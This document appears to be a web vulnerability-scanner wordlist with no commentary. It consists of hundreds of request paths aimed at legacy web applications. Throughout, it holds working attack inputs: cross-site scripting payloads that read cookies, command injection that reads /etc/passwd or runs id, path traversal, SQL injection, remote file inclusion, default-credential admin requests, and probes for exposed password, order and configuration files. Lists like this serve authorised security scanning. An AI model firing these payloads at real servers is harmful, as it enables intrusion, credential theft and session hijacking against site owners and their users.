+modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> +modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+> +webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef +addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> +666%0a%0a<script>alert('Vulnerable');</script>666.jsp +servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> +servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> +servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> +<script>alert('Vulnerable')</script>.shtm +<script>alert('Vulnerable')</script>.stm +admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur +SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> +_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> +nosuchurl/><script>alert('Vulnerable')</script> +test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x +test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x +cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E +search/results.stm?query=<script>alert('vulnerable');</script> +webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> +cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script> +cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> +cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; +cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> +cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E +cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script> +cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> +cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script> +cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E +cgi-bin/myguestbook.cgi?action=view +cgi-bin/login.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT> +cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E +cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> +cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable +cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script> +cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +cgi-bin/diagnose.cgi +cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> +cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> +cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>; +cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= +cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' +cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script> +cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')> +~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null +~/<script>alert('Vulnerable')</script>.aspx +~/<script>alert('Vulnerable')</script>.asp +z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825& +catinfo?<u><b>TESTING +webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +webamil/test.php +users.php?mode=profile&uid=<script>alert(document.cookie)</script> +usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) +user.php?op=userinfo&uname=<script>alert('hi');</script> +user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com +user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com +TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script> +templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> +templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> +supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script> +supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script> +supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script> +sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> +submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview +ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> +showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> +shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script> +setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P +servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> +servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> +servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> +search/index.cfm?<script>alert(\"Vulnerable\")</script> +search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script> +search.php?zoom_query=<script>alert(\"hello\")</script> +search.php?searchstring=<script>alert(document.cookie)</script> +search.php?searchfor=\"><script>alert('Vulnerable');</script> +search.asp?term=<%00script>alert('Vulnerable')</script> +script>alert('Vulnerable')</script>.cfm +samples/search.dll?query=<script>alert(document.cookie)</script> +replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> +profiles.php?uid=<script>alert(document.cookie)</script> +postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft +postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> +pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 +pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello +pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit +phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> +phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] +phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> +phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> +phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +phptonuke.php?filnavn=<script>alert('Vulnerable')</script> +phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E +phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> +phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> +phpimageview.php?pic=javascript:alert('Vulnerable') +phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> +phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> +phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> +phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> +phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> +pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 +pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E +Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> +openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> +openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> +node/view/666\"><script>alert(document.domain)</script> +netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> +nav/cList.php?root=</script><script>alert('Vulnerable')/<script> +myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= +myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= +myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent +myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent +myhome.php?action=messages&box=<script>alert('Vulnerable')</script> +msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> +msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> +msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> +modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> +modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> +modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> +modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 +modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 +modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> +modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| +modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> +modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> +modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> +modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test +modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> +modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> +modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> +modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index +members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 +megabook/admin.cgi?login=<script>alert('Vulnerable')</script> +mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> +mailman/listinfo/<script>alert('Vulnerable')</script> +ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> +launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> +launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> +jigsaw/ +isapi/testisa.dll?check1=<script>alert(document.cookie)</script> +index.php?top_message=<script>alert(document.cookie)</script> +index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> +index.php?catid=<script>alert('Vulnerable')</script> +index.php?action=storenew&username=<script>alert('Vulnerable')</script> +index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script +index.php/\"><script><script>alert(document.cookie)</script>< +index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> +index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu +include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script> +html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> +html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> +html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> +guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E +gallery/search.php?searchstring=<script>alert(document.cookie)</script> +friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> +forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 +forums/index.php?top_message=<script>alert(document.cookie)</script> +forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> +forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script> +esp?PAGE=<script>alert(document.cookie)</script> +error/500error.jsp?et=1<script>alert('Vulnerable')</script>; +downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\" +downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\" +downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\" +download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> +default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E +default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E +comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script> +comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview +cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> +cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< +chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script> +cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> +cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> +cgi-bin/test2.pl?<script>alert('Vulnerable');</script> +cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E +calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 +ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> +ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f +bb000001.pl<script>alert('Vulnerable')</script> +article.php?sid=\"><Img +article.cfm?id=1'<script>alert(document.cookie);</script> +apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> +anthill/login.php +admin/login.php?path=\"></form><form +addressbook/index.php?surname=<script>alert('Vulnerable')</script> +addressbook/index.php?name=<script>alert('Vulnerable')</script> +add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> +a?<script>alert('Vulnerable')</script> +a.jsp/<script>alert('Vulnerable')</script> +?mod=<script>alert(document.cookie)</script>&op=browse +<script>alert('Vulnerable')</script>.thtml +<script>alert('Vulnerable')</script>.shtml +<script>alert('Vulnerable')</script>.jsp +<script>alert('Vulnerable')</script>.aspx +/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> +/comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> +<script>alert('Vulnerable');</script> +%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html +%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e +%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e +%22%3cscript%3ealert(%22xss%22)%3c/script%3e +%0a%0a<script>alert(\"Vulnerable\")</script>.jsp +cgi-bin/title.cgi +cgi-bin/compatible.cgi +add_user.php +cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer +cgi-bin/retrieve_password.pl +cgi-bin/wwwadmin.pl +cfdocs/expeval/displayopenedfile.cfm +cfdocs/expeval/sendmail.cfm +cgi-bin/bigconf.cgi +cgi-bin/webmap.cgi +cgi-bin/wwwwais +ammerum/ +ariadne/ +cbms/cbmsfoot.php +cbms/changepass.php +cbms/editclient.php +cbms/passgen.php +cbms/realinv.php +cbms/usersetup.php +cgi-bin/admin/admin.cgi +cgi-bin/admin/setup.cgi +cgi-bin/mt-static/mt-load.cgi +cgi-bin/mt-static/mt.cfg +cgi-bin/mt/mt-load.cgi +cgi-bin/mt/mt.cfg +cgi-bin-sdb/printenv +ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C +db/users.dat +cgi-bin/cgiwrap/~@USERS +cgi-bin/cgiwrap/~JUNK(5) +cgi-bin/cgiwrap/~root +cgi-bin/dbman/db.cgi?db=no-db +cgi-bin/dcshop/auth_data/auth_user_file.txt +cgi-bin/DCShop/auth_data/auth_user_file.txt +cgi-bin/dcshop/orders/orders.txt +cgi-bin/DCShop/orders/orders.txt +cgi-bin/dumpenv.pl +cgi-bin/htsearch?-c/nonexistant +cgi-bin/mkilog.exe +cgi-bin/mkplog.exe +cgi-bin/orders/orders.txt +cgi-bin/processit.pl +cgi-bin/rpm_query +cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 +cgi-bin/shop/auth_data/auth_user_file.txt +cgi-bin/shop/orders/orders.txt +cgi-bin/ws_ftp.ini +cgi-bin/WS_FTP.ini +?sql_debug=1 +a_security.htm +Admin_files/order.log +admin.html +admin/cplogfile.log +admin/system_footer.php +cfdocs/snippets/fileexists.cfm +cgi-bin/MachineInfo +chat/!nicks.txt +chat/!pwds.txt +chat/data/usr +com +COM +config.php +config/ +cplogfile.log +cutenews/index.php?debug +examples/jsp/snp/anything.snp +file-that-is-not-real-2002.php3 +index.php?sql_debug=1 +cgi-bin/view-source?view-source +cgi-bin/webplus?about +cfdocs/snippets/viewexample.cfm +chassis/config/GeneralChassisConfig.html +cgi-bin/ibill.pm +cgi-bin/scoadminreg.cgi +cgi-bin/SGB_DIR/superguestconfig +hp/device/this.LCDispatcher +cfdocs/snippets/evaluate.cfm +cfide/Administrator/startstop.html +cgi-bin/icat +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/MsmMask.exe?mask=/junk334 +cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 +cgi-bin/query?mss=%2e%2e/config +cgi-bin/test-cgi?/* +cgi-bin/update.dpgs +cgi-bin/view-source +cgi-bin/wrap +Mem/dynaform/FileExplorer.htm +cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com +cgi-bin/lastlines.cgi?process +cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| +cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd| +cgi-bin/campas?%0acat%0a/etc/passwd%0a +cgi-bin/cgicso?query=AAA +cgi-bin/cgiwrap +cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| +cgi-bin/Count.cgi +cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') +cgi-bin/echo.bat +cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/ImageFolio/admin/admin.cgi +cgi-bin/info2www +cgi-bin/info2www +cgi-bin/infosrch.cgi +cgi-bin/listrec.pl +cgi-bin/mailnews.cgi +cgi-bin/mmstdod.cgi +cgi-bin/pagelog.cgi +cgi-bin/perl?-v +cgi-bin/perl.exe?-v +cgi-bin/perl.exe +cgi-bin/perl +cgi-bin/plusmail +cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid +cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| +cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd| +cgi-bin/spin_client.cgi?aaaaaaaa +cgi-bin/sscd_suncourier.pl +cgi-bin/viralator.cgi +cgi-bin/virgil.cgi +cgi-bin/vpasswd.cgi +cgi-bin/webgais +cgi-bin/websendmail +cgi-bin/whois.cgi?action=load&whois=%3Bid +cgi-bin/wwwwais +cd-cgi/sscd_suncourier.pl +cgi-bin/common/listrec.pl +cgi-bin/handler +cgi-bin/handler/netsonar;cat +cgi-bin/webdist.cgi +DB4Web/10.10.10.10:100 +ews/ews/architext_query.pl +exec/show/config/cr +instantwebmail/message.php +cfdocs/snippets/gettempdirectory.cfm +cgi-bin/stat.pl +cgi-bin/cachemgr.cgi +cgi-bin/ppdscgi.exe +cgi-bin/sws/admin.html +cgi-bin/webif.cgi +admin.php?en_log_id=0&action=config +admin.php?en_log_id=0&action=users +admin.php4?reg_login=1 +admin/admin_phpinfo.php4 +admin/login.php?action=insert&username=test&password=test +cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi +interscan/cgi-bin/FtpSave.dll?I'm%20Here +ext.ini.%00.txt +cgi-bin/webdriver +dostuff.php?action=modify_user +cgi-bin/c32web.exe/ChangeAdminPassword +accounts/getuserdesc.asp +cgi-bin/cgi-lib.pl +cgi-bin/log/nether-log.pl?checkit +cgi-bin/mini_logger.cgi +cgi-bin/mt-static/ +cgi-bin/mt/ +cgi-bin/nimages.php +cgi-bin/robadmin.cgi +Admin/ +cgi-bin/netpad.cgi +cgi-bin/troops.cgi +cgi-bin/unlg1.1 +cgi-bin/unlg1.2 +cgi-bin/rwwwshell.pl +cgi-bin/photo/manage.cgi +cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ +achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ +agentadmin.php +b2-include/b2edit.showposts.php +catalog/includes/include_once.php +errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ +sqldump.sql +structure.sql +servlet/SessionManager +php.ini +SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator +ip.txt +JUNK(6).cfm?mode=debug +level/42/exec/show%20conf +livehelp/ +LiveHelp/ +logicworks.ini +login.jsp +logins.html +logs/str_err.log +mall_log_files/order.log +mambo/administrator/phpinfo.php +megabook/files/20/setup.db +modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/* +modules.php?name=Members_List&sql_debug=1 +myinvoicer/config.inc +officescan/hotdownload/ofscan.ini +order/order_log_v12.dat +order/order_log.dat +orders/order_log_v12.dat +Orders/order_log_v12.dat +orders/order_log.dat +Orders/order_log.dat +PDG_Cart/shopper.conf +phorum/admin/stats.php +php-coolfile/action.php?action=edit&file=config.php +phpBB/phpinfo.php +phpinfo.php +phpinfo.php3 +pmlite.php +session/admnlogin +settings/site.ini +SiteScope/htdocs/SiteScope.html +soapdocs/ReleaseNotes.html +ssdefs/siteseed.dtd +servlet/allaire.jrun.ssi.SSIFilter +pp.php?action=login +isapi/count.pl? +krysalis/ +logjam/showhits.php +manual.php +mods/apage/apage.cgi?f=file.htm.|id| +modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +perl/-e%20%22system('cat%20/etc/passwd');\%22 +phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid +Program%20Files/ +smssend.php +pls/simpledad/admin_/dadentries.htm +Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000 +ncl_items.html +ncl_items.shtml?SUBJECT=1 +photo/manage.cgi +photodata/manage.cgi +php-coolfile/action.php?action=edit&file=config.php +pub/english.cgi?op=rmail +pvote/ch_info.php?newpass=password&confirm=password%20 +scripts/wsisa.dll/WService=anything?WSMadmin +SetSecurity.shm +submit?setoption=q&option=allowed_ips&value=255.255.255.255 +thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin +servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a +shopadmin.asp +modsecurity.php +phpBB2/includes/db.php +<script>alert('Vulnerable')</script> +_vti_bin/shtml.exe/junk_nonexistant.exe +_vti_txt/_vti_cnf/ +_vti_txt/ +_vti_pvt/deptodoc.btr +_vti_pvt/doctodep.btr +_vti_pvt/services.org +_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 +_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 +_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude +_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude +_vti_bin/_vti_aut/dvwssr.dll +_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +_vti_bin/_vti_aut/fp30reg.dll +_vti_pvt/access.cnf +_vti_pvt/botinfs.cnf +_vti_pvt/bots.cnf +_vti_pvt/service.cnf +_vti_pvt/services.cnf +_vti_pvt/svacl.cnf +_vti_pvt/writeto.cnf +_vti_pvt/linkinfo.cnf +admin/ +isx.html +// +cgi-bin/blog/mt-check.cgi +mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; +mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com +mailman/listinfo +doc/ +doc +webalizer/ +web/ +usage/ +sitemap.xml +phpshare/phpshare.php +photo_album/apa_phpinclude.inc.php +cgis/wwwboard/wwwboard.cgi +cgis/wwwboard/wwwboard.pl +affich.php?image=<script>alert(document.cookie)</script> +diapo.php?rep=<script>alert(document.cookie)</script> +index.php?rep=<script>alert(document.cookie)</script> +admin/contextAdmin/contextAdmin.html +fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> +fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> +blahb.ida +blahb.idq +ab2/\@AdminViewError +.DS_Store +.FBCIndex +\"><img%20src=\"javascript:alert(document.domain)\"> +Survey/Survey.Htm +WEBAGENT/CQMGSERV/CF-SINFO.TPF +ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar +ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> +apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script> +ba4.nsf +BACLIENT +postinfo.html +na_admin/ataglance.html +scripts/samples/search/qfullhit.htw +scripts/samples/search/qsumrhit.htw +JUNK(5).htw + + +ttp://127.0.0.1:2301/ +file/../../../../../../../../etc/ +level/16/exec/-///pwd +level/16/exec/-///show/configuration +level/16 +level/16/exec/ +level/16/exec//show/access-lists +level/16/level/16/exec//show/configuration +level/16/level/16/exec//show/interfaces +level/16/level/16/exec//show/interfaces/status +level/16/level/16/exec//show/version +level/16/level/16/exec//show/running-config/interface/FastEthernet +level/16/exec//show +level/17/exec//show +level/18/exec//show +level/19/exec//show +level/20/exec//show +level/21/exec//show +level/22/exec//show +level/23/exec//show +level/24/exec//show +level/25/exec//show +level/26/exec//show +level/27/exec//show +level/28/exec//show +level/29/exec//show +level/30/exec//show +level/31/exec//show +level/32/exec//show +level/33/exec//show 